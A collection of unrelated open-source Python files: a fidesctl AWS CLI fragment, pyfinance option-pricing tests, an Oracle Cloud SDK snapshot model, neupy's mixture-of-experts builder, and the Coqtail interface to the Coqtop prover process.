reference to fidesctl config, or boto3 environment configuration.
Tracked resources: [Redshift, RDS]
This is a one-time operation that does not track the state of the aws resources.
It will need to be run again if the tracked resources change.
"""
config = ctx.obj["CONFIG"]
aws_config = handle_aws_credentials_options(
fides_config=config,
access_key_id=access_key_id,
secret_access_key=secret_access_key,
region=region,
credentials_id=credentials_id,
)
_system.generate_system_aws(
file_name=output_filename,
include_null=include_null,
organization_key=organization,
aws_config=aws_config,
url=config.cli.server_url,
headers=config.user.request_headers,
)
|
tests/test_options.py
|
gliptak/pyfinance
| 278 |
67327
|
# flake8: noqa
# Test cases taken from:
# - Thomas Ho Company LTD: financial models,
# http://www.thomasho.com/mainpages/analysoln.asp
# - Analysis of Derivatives for the Chartered Financial Analyst® Program,
# <NAME>, PhD, CFA, ©2003 CFA Institute
import types
import numpy as np
import pandas as pd
from pyfinance.options import *
np.random.seed(123)
RTOL = 1e-03
# BSM
# ---------------------------------------------------------------------
s, k, t, sigma, r = 100.0, 100.0, 1.0, 0.2, 0.04
greeks = {
"call": (
0.3,
0.1,
0.61791,
0.01907,
38.13878,
-5.88852,
51.86609,
6.22577,
),
"put": (
0.3,
0.1,
-0.38209,
0.01907,
38.13878,
-2.04536,
-44.21286,
-6.36390,
),
}
names = ("d1", "d2", "delta", "gamma", "vega", "theta", "rho", "omega")
target = {
"call": dict(zip(names, greeks["call"])),
"put": dict(zip(names, greeks["put"])),
}
target["call"].update({"value": 9.92505})
target["put"].update({"value": 6.00400})
options = {
"call": BSM(S0=s, K=k, T=t, r=r, sigma=sigma, kind="call"),
"put": BSM(S0=s, K=k, T=t, r=r, sigma=sigma, kind="put"),
}
def test_BSM():
for name, option in options.items():
for k, v in target[name].items():
if isinstance(getattr(option, k), types.MethodType):
assert np.allclose(v, getattr(option, k)(), rtol=RTOL)
else:
assert np.allclose(v, getattr(option, k), rtol=RTOL)
# Put/call
# ---------------------------------------------------------------------
k, price, s = 2000.0, 81.75, np.array([1900.0, 2100.0])
call = Call(K=k, price=price, St=s, pos="long")
put = Put(K=k, price=price, St=s, pos="long")
def test_put_and_call():
assert np.allclose(call.payoff(), np.array([0.0, 100.0]))
assert np.allclose(call.profit(), np.array([-81.75, 18.25]))
assert np.allclose(put.payoff(), np.array([100.0, 0.0]))
assert np.allclose(put.profit(), np.array([18.25, -81.75]))
# Options strategies
# ---------------------------------------------------------------------
# Straddle', 'ShortStraddle', 'Strangle',
# 'ShortStrangle', 'Strip', 'Strap', 'BullSpread', 'BearSpread',
# 'LongPutLadder', 'ShortPutLadder', 'LongButterfly', 'ShortButterfly',
# 'LongIronButterfly', 'ShortIronButterfly', 'LongCondor', 'ShortCondor',
# 'LongIronCondor', 'ShortIronCondor'
s = np.array([2100, 2000, 1900])
k1 = 1950.0
k2 = 2050.0
p1 = 108.43
p2 = 59.98
bullspread = BullSpread(St=s, K1=k1, K2=k2, price1=p1, price2=p2)
p1 = 56.01
p2 = 107.39
bearspread = BearSpread(St=s, K1=k1, K2=k2, price1=p1, price2=p2)
# TODO
# bs = {
# 'call': BullSpread(St=s, K1=k1, K2=k2, price1=p1, price2=p2, kind='call'),
# 'put': BullSpread(St=s, K1=k1, K2=k2, price1=p1, price2=p2, kind='put')
# }
s = np.array([1900.0, 1975.0, 2025.0, 2100.0])
k1, k2, k3 = 1950.0, 2000.0, 2050.0
p1, p2, p3 = 108.43, 81.75, 59.98
bfly = LongButterfly(
St=s, K1=k1, K2=k2, K3=k3, price1=p1, price2=p2, price3=p3, kind="call"
)
s = np.array([2100.0, 1900.0])
k = 2000
c = 81.75
p = 79.25
straddle = Straddle(St=s, K=k, callprice=c, putprice=p)
def test_opstrats():
assert np.allclose(
bullspread.payoff(), np.array([100.0, 50.0, 0.0]), rtol=RTOL
)
assert np.allclose(
bullspread.profit(), np.array([51.55, 1.55, -48.45]), rtol=RTOL
)
assert np.allclose(
bearspread.payoff(), np.array([0.0, 50.0, 100.0]), rtol=RTOL
)
assert np.allclose(
bearspread.profit(), np.array([-51.38, -1.38, 48.62]), rtol=RTOL
)
assert np.allclose(
bfly.payoff(), np.array([0.0, 25.0, 25.0, 0.0]), rtol=RTOL
)
assert np.allclose(
bfly.profit(), np.array([-4.91, 20.09, 20.09, -4.91]), rtol=RTOL
)
assert np.allclose(straddle.payoff(), np.array([100.0, 100.0]), rtol=RTOL)
assert np.allclose(straddle.profit(), np.array([-61.0, -61.0]), rtol=RTOL)
|
src/oci/file_storage/models/snapshot.py
|
Manny27nyc/oci-python-sdk
| 249 |
67330
|
<filename>src/oci/file_storage/models/snapshot.py
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class Snapshot(object):
"""
A point-in-time snapshot of a specified file system.
**Warning:** Oracle recommends that you avoid using any confidential information when you supply string values using the API.
"""
#: A constant which can be used with the lifecycle_state property of a Snapshot.
#: This constant has a value of "CREATING"
LIFECYCLE_STATE_CREATING = "CREATING"
#: A constant which can be used with the lifecycle_state property of a Snapshot.
#: This constant has a value of "ACTIVE"
LIFECYCLE_STATE_ACTIVE = "ACTIVE"
#: A constant which can be used with the lifecycle_state property of a Snapshot.
#: This constant has a value of "DELETING"
LIFECYCLE_STATE_DELETING = "DELETING"
#: A constant which can be used with the lifecycle_state property of a Snapshot.
#: This constant has a value of "DELETED"
LIFECYCLE_STATE_DELETED = "DELETED"
def __init__(self, **kwargs):
"""
Initializes a new Snapshot object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param file_system_id:
The value to assign to the file_system_id property of this Snapshot.
:type file_system_id: str
:param id:
The value to assign to the id property of this Snapshot.
:type id: str
:param lifecycle_state:
The value to assign to the lifecycle_state property of this Snapshot.
Allowed values for this property are: "CREATING", "ACTIVE", "DELETING", "DELETED", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type lifecycle_state: str
:param name:
The value to assign to the name property of this Snapshot.
:type name: str
:param time_created:
The value to assign to the time_created property of this Snapshot.
:type time_created: datetime
:param provenance_id:
The value to assign to the provenance_id property of this Snapshot.
:type provenance_id: str
:param is_clone_source:
The value to assign to the is_clone_source property of this Snapshot.
:type is_clone_source: bool
:param lifecycle_details:
The value to assign to the lifecycle_details property of this Snapshot.
:type lifecycle_details: str
:param freeform_tags:
The value to assign to the freeform_tags property of this Snapshot.
:type freeform_tags: dict(str, str)
:param defined_tags:
The value to assign to the defined_tags property of this Snapshot.
:type defined_tags: dict(str, dict(str, object))
"""
self.swagger_types = {
'file_system_id': 'str',
'id': 'str',
'lifecycle_state': 'str',
'name': 'str',
'time_created': 'datetime',
'provenance_id': 'str',
'is_clone_source': 'bool',
'lifecycle_details': 'str',
'freeform_tags': 'dict(str, str)',
'defined_tags': 'dict(str, dict(str, object))'
}
self.attribute_map = {
'file_system_id': 'fileSystemId',
'id': 'id',
'lifecycle_state': 'lifecycleState',
'name': 'name',
'time_created': 'timeCreated',
'provenance_id': 'provenanceId',
'is_clone_source': 'isCloneSource',
'lifecycle_details': 'lifecycleDetails',
'freeform_tags': 'freeformTags',
'defined_tags': 'definedTags'
}
self._file_system_id = None
self._id = None
self._lifecycle_state = None
self._name = None
self._time_created = None
self._provenance_id = None
self._is_clone_source = None
self._lifecycle_details = None
self._freeform_tags = None
self._defined_tags = None
@property
def file_system_id(self):
"""
**[Required]** Gets the file_system_id of this Snapshot.
The `OCID`__ of the file system from which the snapshot
was created.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:return: The file_system_id of this Snapshot.
:rtype: str
"""
return self._file_system_id
@file_system_id.setter
def file_system_id(self, file_system_id):
"""
Sets the file_system_id of this Snapshot.
The `OCID`__ of the file system from which the snapshot
was created.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param file_system_id: The file_system_id of this Snapshot.
:type: str
"""
self._file_system_id = file_system_id
@property
def id(self):
"""
**[Required]** Gets the id of this Snapshot.
The `OCID`__ of the snapshot.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:return: The id of this Snapshot.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""
Sets the id of this Snapshot.
The `OCID`__ of the snapshot.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param id: The id of this Snapshot.
:type: str
"""
self._id = id
@property
def lifecycle_state(self):
"""
**[Required]** Gets the lifecycle_state of this Snapshot.
The current state of the snapshot.
Allowed values for this property are: "CREATING", "ACTIVE", "DELETING", "DELETED", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The lifecycle_state of this Snapshot.
:rtype: str
"""
return self._lifecycle_state
@lifecycle_state.setter
def lifecycle_state(self, lifecycle_state):
"""
Sets the lifecycle_state of this Snapshot.
The current state of the snapshot.
:param lifecycle_state: The lifecycle_state of this Snapshot.
:type: str
"""
allowed_values = ["CREATING", "ACTIVE", "DELETING", "DELETED"]
if not value_allowed_none_or_none_sentinel(lifecycle_state, allowed_values):
lifecycle_state = 'UNKNOWN_ENUM_VALUE'
self._lifecycle_state = lifecycle_state
@property
def name(self):
"""
**[Required]** Gets the name of this Snapshot.
Name of the snapshot. This value is immutable.
Avoid entering confidential information.
Example: `Sunday`
:return: The name of this Snapshot.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this Snapshot.
Name of the snapshot. This value is immutable.
Avoid entering confidential information.
Example: `Sunday`
:param name: The name of this Snapshot.
:type: str
"""
self._name = name
@property
def time_created(self):
"""
**[Required]** Gets the time_created of this Snapshot.
The date and time the snapshot was created, expressed
in `RFC 3339`__ timestamp format.
Example: `2016-08-25T21:10:29.600Z`
__ https://tools.ietf.org/rfc/rfc3339
:return: The time_created of this Snapshot.
:rtype: datetime
"""
return self._time_created
@time_created.setter
def time_created(self, time_created):
"""
Sets the time_created of this Snapshot.
The date and time the snapshot was created, expressed
in `RFC 3339`__ timestamp format.
Example: `2016-08-25T21:10:29.600Z`
__ https://tools.ietf.org/rfc/rfc3339
:param time_created: The time_created of this Snapshot.
:type: datetime
"""
self._time_created = time_created
@property
def provenance_id(self):
"""
Gets the provenance_id of this Snapshot.
An `OCID`__ identifying the parent from which this snapshot was cloned.
If this snapshot was not cloned, then the `provenanceId` is the same as the snapshot `id` value.
If this snapshot was cloned, then the `provenanceId` value is the parent's `provenanceId`.
See `Cloning a File System`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
__ https://docs.cloud.oracle.com/iaas/Content/File/Tasks/cloningafilesystem.htm
:return: The provenance_id of this Snapshot.
:rtype: str
"""
return self._provenance_id
@provenance_id.setter
def provenance_id(self, provenance_id):
"""
Sets the provenance_id of this Snapshot.
An `OCID`__ identifying the parent from which this snapshot was cloned.
If this snapshot was not cloned, then the `provenanceId` is the same as the snapshot `id` value.
If this snapshot was cloned, then the `provenanceId` value is the parent's `provenanceId`.
See `Cloning a File System`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
__ https://docs.cloud.oracle.com/iaas/Content/File/Tasks/cloningafilesystem.htm
:param provenance_id: The provenance_id of this Snapshot.
:type: str
"""
self._provenance_id = provenance_id
@property
def is_clone_source(self):
"""
Gets the is_clone_source of this Snapshot.
Specifies whether the snapshot has been cloned.
See `Cloning a File System`__.
__ https://docs.cloud.oracle.com/iaas/Content/File/Tasks/cloningafilesystem.htm
:return: The is_clone_source of this Snapshot.
:rtype: bool
"""
return self._is_clone_source
@is_clone_source.setter
def is_clone_source(self, is_clone_source):
"""
Sets the is_clone_source of this Snapshot.
Specifies whether the snapshot has been cloned.
See `Cloning a File System`__.
__ https://docs.cloud.oracle.com/iaas/Content/File/Tasks/cloningafilesystem.htm
:param is_clone_source: The is_clone_source of this Snapshot.
:type: bool
"""
self._is_clone_source = is_clone_source
@property
def lifecycle_details(self):
"""
Gets the lifecycle_details of this Snapshot.
Additional information about the current 'lifecycleState'.
:return: The lifecycle_details of this Snapshot.
:rtype: str
"""
return self._lifecycle_details
@lifecycle_details.setter
def lifecycle_details(self, lifecycle_details):
"""
Sets the lifecycle_details of this Snapshot.
Additional information about the current 'lifecycleState'.
:param lifecycle_details: The lifecycle_details of this Snapshot.
:type: str
"""
self._lifecycle_details = lifecycle_details
@property
def freeform_tags(self):
"""
Gets the freeform_tags of this Snapshot.
Free-form tags for this resource. Each tag is a simple key-value pair
with no predefined name, type, or namespace.
For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:return: The freeform_tags of this Snapshot.
:rtype: dict(str, str)
"""
return self._freeform_tags
@freeform_tags.setter
def freeform_tags(self, freeform_tags):
"""
Sets the freeform_tags of this Snapshot.
Free-form tags for this resource. Each tag is a simple key-value pair
with no predefined name, type, or namespace.
For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:param freeform_tags: The freeform_tags of this Snapshot.
:type: dict(str, str)
"""
self._freeform_tags = freeform_tags
@property
def defined_tags(self):
"""
Gets the defined_tags of this Snapshot.
Defined tags for this resource. Each key is predefined and scoped to a namespace.
For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:return: The defined_tags of this Snapshot.
:rtype: dict(str, dict(str, object))
"""
return self._defined_tags
@defined_tags.setter
def defined_tags(self, defined_tags):
"""
Sets the defined_tags of this Snapshot.
Defined tags for this resource. Each key is predefined and scoped to a namespace.
For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:param defined_tags: The defined_tags of this Snapshot.
:type: dict(str, dict(str, object))
"""
self._defined_tags = defined_tags
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
|
neupy/architectures/mixture_of_experts.py
|
FrostByte266/neupy
| 801 |
67333
|
import tensorflow as tf
from neupy import layers
from neupy.utils import tf_utils, as_tuple
from neupy.layers.base import BaseGraph
__all__ = ('mixture_of_experts',)
def check_if_network_is_valid(network, index):
if not isinstance(network, BaseGraph):
raise TypeError(
"Invalid input, Mixture of experts expects networks/layers"
"in the list of networks, got `{}` instance instead"
"".format(type(network)))
if len(network.input_layers) > 1:
raise ValueError(
"Each network from the mixture of experts has to process single "
"input tensor. Network #{} (0-based indices) has more than one "
"input layer. Input layers: {}"
"".format(index, network.output_layers))
if len(network.output_layers) > 1:
raise ValueError(
"Each network from the mixture of experts has to output single "
"tensor. Network #{} (0-based indices) has more than one output "
"layer. Output layers: {}".format(index, network.output_layers))
if network.input_shape.ndims != 2:
raise ValueError(
"Each network from the mixture of experts has to process "
"only 2-dimensional inputs. Network #{} (0-based indices) "
"processes only {}-dimensional inputs. Input layer's shape: {}"
"".format(index, network.input_shape.ndims, network.input_shape))
def check_if_networks_compatible(networks):
input_shapes = []
output_shapes = []
for i, network in enumerate(networks):
input_shapes.append(network.input_shape)
output_shapes.append(network.output_shape)
for shape in input_shapes:
if not shape.is_compatible_with(input_shapes[0]):
raise ValueError(
"Networks have incompatible input shapes. Shapes: {}"
"".format(tf_utils.shape_to_tuple(input_shapes)))
for shape in output_shapes:
if not shape.is_compatible_with(output_shapes[0]):
raise ValueError(
"Networks have incompatible output shapes. Shapes: {}"
"".format(tf_utils.shape_to_tuple(output_shapes)))
def mixture_of_experts(networks, gating_layer=None):
"""
Generates mixture of experts architecture from the set of
networks that has the same input and output shapes.
Mixture of experts learns to how to mix results from different
networks in order to get better performances. It adds gating layer
that using input data tries to figure out which of the networks
will make better contribution to the final result. The final result
mixes from all networks using different weights. The higher the weight
the larger contribution from the individual layer.
Parameters
----------
networks : list of networks/layers
gating_layer : None or layer
In case if value equal to `None` that the following layer
will be created.
.. code-block:: python
gating_layer = layers.Softmax(len(networks))
Output from the gating layer should be 1D and equal to
the number of networks.
Raises
------
ValueError
In case if there is some problem with input networks
or custom gating layer.
Returns
-------
network
Mixture of experts network that combine all networks into
single one and adds gating layer to it.
Examples
--------
>>> from neupy import algorithms, architectures
>>> from neupy.layers import *
>>>
>>> network = architectures.mixture_of_experts([
... join(
... Input(10),
... Relu(5),
... ),
... join(
... Input(10),
... Relu(33),
... Relu(5),
... ),
... join(
... Input(10),
... Relu(12),
... Relu(25),
... Relu(5),
... ),
... ])
>>> network
(?, 10) -> [... 12 layers ...] -> (?, 5)
>>>
>>> optimizer = algorithms.Momentum(network, step=0.1)
"""
if not isinstance(networks, (list, tuple)):
raise ValueError("Networks should be specified as a list")
for index, network in enumerate(networks):
check_if_network_is_valid(network, index)
check_if_networks_compatible(networks)
input_shape = tf.TensorShape(None)
for network in networks:
input_shape = input_shape.merge_with(network.input_shape)
n_layers_to_combine = len(networks)
n_features = input_shape[1].value
if n_features is None:
raise ValueError(
"Cannot create mixture of experts model, because "
"number of input features is unknown")
if gating_layer is None:
gating_layer = layers.Softmax(n_layers_to_combine)
if not isinstance(gating_layer, layers.BaseLayer):
raise ValueError(
"Invalid type for gating layer. Type: {}"
"".format(type(gating_layer)))
return layers.join(
layers.Input(n_features),
# Note: Gating network should be specified
# as a first parameter.
layers.parallel(*as_tuple(gating_layer, networks)),
layers.GatedAverage(),
)
|
python/coqtop.py
|
Lysxia/Coqtail
| 160 |
67334
|
# -*- coding: utf8 -*-
# Author: <NAME>
"""Coqtop interface with functions to send commands and parse responses."""
import datetime
import logging
import signal
import subprocess
import threading
import time
from concurrent import futures
from queue import Empty, Queue
from tempfile import NamedTemporaryFile
from typing import (
IO,
TYPE_CHECKING,
Any,
Iterable,
Iterator,
List,
Mapping,
Optional,
Tuple,
Union,
)
from xmlInterface import (
TIMEOUT_ERR,
UNEXPECTED_ERR,
Err,
FindCoqtopError,
Goals,
Ok,
Result,
XMLInterface,
XMLInterfaceBase,
partition_warnings,
prettyxml,
)
if TYPE_CHECKING:
# pylint: disable=unsubscriptable-object
from typing_extensions import TypedDict
BytesQueue = Queue[bytes]
CoqtopProcess = subprocess.Popen[bytes]
VersionInfo = TypedDict(
"VersionInfo",
{
"version": Tuple[int, int, int],
"str_version": str,
"latest": Optional[str],
},
)
else:
BytesQueue = Queue
CoqtopProcess = subprocess.Popen
VersionInfo = Mapping[str, Any]
class CoqtopError(Exception):
"""An exception for when Coqtop stops unexpectedly."""
class Coqtop:
"""Provide an interface to the background Coqtop process."""
def __init__(self) -> None:
"""Initialize Coqtop state.
coqtop - The Coqtop process
states - A stack of previous state_ids (grows to the right)
state_id - The current state_id
root_state - The starting state_id
out_q - A thread-safe queue of data read from Coqtop
err_q - A thread-safe queue of error messages read from Coqtop
xml - The XML interface for the given version
"""
self.coqtop: Optional[CoqtopProcess] = None
self.xml: Optional[XMLInterfaceBase] = None
self.states: List[int] = []
self.state_id = -1
self.root_state = -1
self.out_q: BytesQueue = Queue()
self.err_q: BytesQueue = Queue()
self.stopping = False
# Debugging
self.log: Optional[IO[str]] = None
self.handler: logging.Handler = logging.NullHandler()
self.logger = logging.getLogger(str(id(self)))
self.logger.addHandler(self.handler)
self.logger.setLevel(logging.INFO)
# Coqtop Interface #
def start(
self,
coq_path: Optional[str],
coq_prog: Optional[str],
filename: str,
args: Iterable[str],
timeout: Optional[int] = None,
) -> Tuple[Union[VersionInfo, str], str]:
"""Launch the Coqtop process."""
assert self.coqtop is None
try:
self.logger.debug("start")
self.xml, latest = XMLInterface(coq_path, coq_prog)
launch = self.xml.launch(filename, args)
self.logger.debug(launch)
self.coqtop = subprocess.Popen( # pylint: disable=consider-using-with
launch,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=0,
)
# Ensure that Coqtop spawned correctly
try:
self.coqtop.wait(timeout=0.1)
assert self.coqtop.stderr is not None
return self.coqtop.stderr.read().decode("utf8"), ""
except subprocess.TimeoutExpired:
pass
# Spawn threads to monitor Coqtop's stdout and stderr
for buf, stream in (
(self.out_q, self.coqtop.stdout),
(self.err_q, self.coqtop.stderr),
):
threading.Thread(
target=self.capture_out,
args=(buf, stream),
daemon=True,
).start()
threading.Thread(target=self.capture_dead, daemon=True).start()
# Initialize Coqtop
response, err = self.call(self.xml.init(), timeout=timeout)
if isinstance(response, Err):
return response.msg, err
self.root_state = response.val
self.state_id = response.val
return (
{
"version": self.xml.version,
"str_version": self.xml.str_version,
"latest": latest,
},
err,
)
except (OSError, FindCoqtopError) as e:
# Failed to launch or find Coqtop
self.coqtop = None
return str(e), ""
def stop(self) -> None:
"""End the Coqtop process."""
if self.coqtop is not None:
self.logger.debug("stop")
self.stopping = True
try:
# Try to terminate Coqtop cleanly
# TODO: use Quit call
self.coqtop.terminate()
self.coqtop.communicate()
except (OSError, ValueError, AttributeError):
try:
# Force Coqtop to stop
self.coqtop.kill()
except (OSError, AttributeError):
pass
self.coqtop = None
# Close debugging log
try:
self.handler.flush()
self.handler.close()
except ValueError:
pass
if self.log is not None and not self.log.closed:
self.log.close()
def advance(
self,
cmd: str,
encoding: str = "utf-8",
timeout: Optional[int] = None,
) -> Tuple[bool, str, Optional[Tuple[int, int]], str]:
"""Advance Coqtop by sending 'cmd'."""
assert self.xml is not None
self.logger.debug("advance: %s", cmd)
response, err1 = self.call(
self.xml.add(cmd, self.state_id, encoding=encoding),
timeout=timeout,
)
if isinstance(response, Err):
return False, response.msg, response.loc, err1
# In addition to sending 'cmd', also check status in order to force it
# to be evaluated
status, err2 = self.call(self.xml.status(encoding=encoding), timeout=timeout)
# Combine messages
msgs = "\n\n".join(
msg
for msg in (response.msg, response.val["res_msg"], status.msg)
if msg != ""
)
err = err1 + err2
if isinstance(status, Err):
# Reset state id to before the error
self.call(self.xml.edit_at(self.state_id, 1))
return False, msgs, status.loc, err
self.states.append(self.state_id)
self.state_id = response.val["state_id"]
return True, msgs, None, err
def rewind(self, steps: int = 1) -> Tuple[bool, str, Optional[int], str]:
"""Go back 'steps' states."""
assert self.xml is not None
self.logger.debug("rewind: %d", steps)
if steps > len(self.states):
self.state_id = self.root_state
self.states = []
steps = len(self.states)
else:
# In 8.4 query and option commands will be recorded with
# state_id = -1. Need to count them and reduce number of steps to
# rewind so Coqtop doesn't go too far back
fake_steps = sum(s == -1 for s in self.states[-steps:])
if self.states[-steps] != -1:
self.state_id = self.states[-steps]
else:
self.state_id = 0
self.states = self.states[:-steps]
steps -= fake_steps
response, err = self.call(self.xml.edit_at(self.state_id, steps))
return (
isinstance(response, Ok),
response.msg,
response.val if isinstance(response, Ok) else None,
err,
)
def query(
self,
cmd: str,
in_script: bool,
encoding: str = "utf-8",
timeout: Optional[int] = None,
) -> Tuple[bool, str, Optional[Tuple[int, int]], str]:
"""Query Coqtop with 'cmd'."""
assert self.xml is not None
self.logger.debug("query: %s", cmd)
response, err = self.call(
self.xml.query(cmd, self.state_id, encoding=encoding),
timeout=timeout,
)
if isinstance(response, Ok) and in_script:
# If the query was called from within the script we need to record
# the state id so rewinding will work properly. Since 8.4 uses
# number of steps rather than state ids, record '-1' to indicate
# that no rewind should actually be done
if self.xml.version >= (8, 5, 0):
self.states.append(self.state_id)
else:
self.states.append(-1)
return (
isinstance(response, Ok),
response.msg,
None if isinstance(response, Ok) else response.loc,
err,
)
def goals(
self,
timeout: Optional[int] = None,
) -> Tuple[bool, str, Optional[Goals], str]:
"""Get the current set of hypotheses and goals."""
assert self.xml is not None
self.logger.debug("goals")
response, err = self.call(self.xml.goal(), timeout=timeout)
return (
isinstance(response, Ok),
response.msg,
response.val if isinstance(response, Ok) else None,
err,
)
def do_option(
self,
cmd: str,
in_script: bool,
encoding: str = "utf-8",
timeout: Optional[int] = None,
) -> Tuple[bool, str, Optional[Tuple[int, int]], str]:
"""Set or get an option."""
assert self.xml is not None
self.logger.debug("do_option: %s", cmd)
vals, opt = self.xml.parse_option(cmd)
if vals is None:
response, err = self.call(
self.xml.get_options(encoding=encoding),
timeout=timeout,
)
if isinstance(response, Ok):
optval = [
(val, desc) for name, desc, val in response.val if name == opt
]
if optval != []:
ret = f"{optval[0][1]}: {optval[0][0]}"
else:
ret = "Invalid option name"
else:
errs = []
for val in vals:
response, err = self.call(
self.xml.set_options(opt, val, encoding=encoding),
timeout=timeout,
)
ret = response.msg
errs.append(err)
if isinstance(response, Ok):
break
err = "".join(errs)
if isinstance(response, Ok) and in_script:
# Hack to associate setting an option with a new state id by
# executing a noop so it works correctly with rewinding
if in_script:
success, _, _, _ = self.advance(self.xml.noop, encoding)
assert success
return (
isinstance(response, Ok),
ret if isinstance(response, Ok) else response.msg,
None if isinstance(response, Ok) else response.loc,
err,
)
def dispatch(
self,
cmd: str,
cmd_no_comment: Optional[str] = None,
in_script: bool = True,
encoding: str = "utf-8",
timeout: Optional[int] = None,
) -> Tuple[bool, str, Optional[Tuple[int, int]], str]:
"""Decide whether 'cmd' is setting/getting an option, a query, or a
regular command.
"""
# pylint: disable=no-else-return
assert self.xml is not None
if cmd_no_comment is None:
cmd_no_comment = cmd
if self.xml.is_option(cmd_no_comment):
return self.do_option(cmd_no_comment, in_script, encoding, timeout)
elif self.xml.is_query(cmd_no_comment):
return self.query(cmd, in_script, encoding, timeout)
elif in_script:
return self.advance(cmd, encoding, timeout)
else:
return True, "Command only allowed in script.", None, ""
# Interacting with Coqtop #
def call(
self,
cmdtype_msg: Tuple[str, Optional[bytes]],
timeout: Optional[int] = None,
) -> Tuple[Result, str]:
"""Send 'msg' to the Coqtop process and wait for the response."""
assert self.xml is not None
# Check if Coqtop has stopped
if not self.running():
raise CoqtopError("Coqtop is not running.")
# Throw away any unread messages
self.empty_out()
# 'msg' can be None if a command does not exist for a particular
# version and is being faked.
# NOTE: It is important that the '_standardize' function being called
# does not depend on the value it is passed since it is None
cmd, msg = cmdtype_msg
if msg is None:
return self.xml.standardize(cmd, Ok(None)), self.collect_err()
# Don't bother doing prettyxml if debugging isn't on
if self.logger.isEnabledFor(logging.DEBUG):
self.logger.debug(prettyxml(msg))
self.send_cmd(msg)
with futures.ThreadPoolExecutor(1) as pool:
try:
timeout = timeout if timeout != 0 else None
response, err = pool.submit(self.get_answer).result(timeout)
except futures.TimeoutError:
self.interrupt()
response, err = TIMEOUT_ERR, ""
return self.xml.standardize(cmd, response), err
def get_answer(self) -> Tuple[Result, str]:
"""Read from 'out_q' and wait until a full response is received."""
assert self.xml is not None
data = []
poll_sec = 1
while True:
# Abort if an error is printed to stderr, but ignore warnings.
# NOTE: If `warnings_wf` is False because this version of Coq does
# not follow the pattern expected by `partition_warnings` then
# pretend everything is a warning and hope for the best.
err = self.collect_err()
if self.xml.warnings_wf and partition_warnings(err)[1] != "":
return UNEXPECTED_ERR, err
try:
data.append(self.out_q.get(timeout=poll_sec))
except Empty:
continue
xml = b"".join(data)
if not self.xml.worth_parsing(xml):
continue
response = self.xml.raw_response(xml)
if response is None:
continue
# Don't bother doing prettyxml if debugging isn't on
if self.logger.isEnabledFor(logging.DEBUG):
self.logger.debug(prettyxml(b"<response>" + xml + b"</response>"))
return response, err
@staticmethod
def drain_queue(q: BytesQueue) -> Iterator[bytes]:
"""Yield data from 'q' until it is empty."""
while not q.empty():
try:
yield q.get_nowait()
except Empty:
return
def empty_out(self) -> None:
"""Pop data until 'out_q' is empty."""
for _ in Coqtop.drain_queue(self.out_q):
pass
def collect_err(self) -> str:
"""Pop and concatenate everything in 'err_q'."""
err = b"".join(Coqtop.drain_queue(self.err_q)).decode("utf-8")
if err != "":
self.logger.debug(err)
return err
def capture_out(self, buffer: BytesQueue, stream: IO[bytes]) -> None:
"""Continually read data from 'stream' into 'buffer'."""
while not self.stopping:
try:
buffer.put(stream.read(0x10000))
except (AttributeError, OSError, ValueError):
# Coqtop died
return
def capture_dead(self) -> None:
"""Continually check if Coqtop has died."""
while self.running():
time.sleep(1)
self.stop()
def send_cmd(self, cmd: bytes) -> None:
"""Write to Coqtop's stdin."""
if self.coqtop is None:
raise CoqtopError("coqtop must not be None in send_cmd()")
if self.coqtop.stdin is None:
raise CoqtopError("coqtop stdin must not be None in send_cmd()")
self.coqtop.stdin.write(cmd)
self.coqtop.stdin.flush()
def interrupt(self) -> None:
"""Send a SIGINT signal to Coqtop."""
if self.coqtop is None:
raise CoqtopError("Coqtop is not running.")
self.coqtop.send_signal(signal.SIGINT)
# Current State #
def running(self) -> bool:
"""Check if Coqtop has already been started."""
return self.coqtop is not None and self.coqtop.poll() is None
# Debugging #
def toggle_debug(self) -> Optional[str]:
"""Enable or disable logging of debug messages."""
self.logger.removeHandler(self.handler)
self.handler.flush()
self.handler.close()
if self.log is None:
# Create unique log file
fmt = logging.Formatter("%(asctime)s: %(message)s")
self.log = NamedTemporaryFile( # pylint: disable=consider-using-with
mode="w",
prefix=f"coqtop_{datetime.datetime.now().strftime('%y%m%d_%H%M%S')}_",
delete=False,
)
self.handler = logging.StreamHandler(self.log)
self.handler.setFormatter(fmt)
self.logger.addHandler(self.handler)
self.logger.setLevel(logging.DEBUG)
else:
# Clean up old logging
self.log.close()
# Set to null logging
self.log = None
self.handler = logging.NullHandler()
self.logger.addHandler(self.handler)
self.logger.setLevel(logging.CRITICAL)
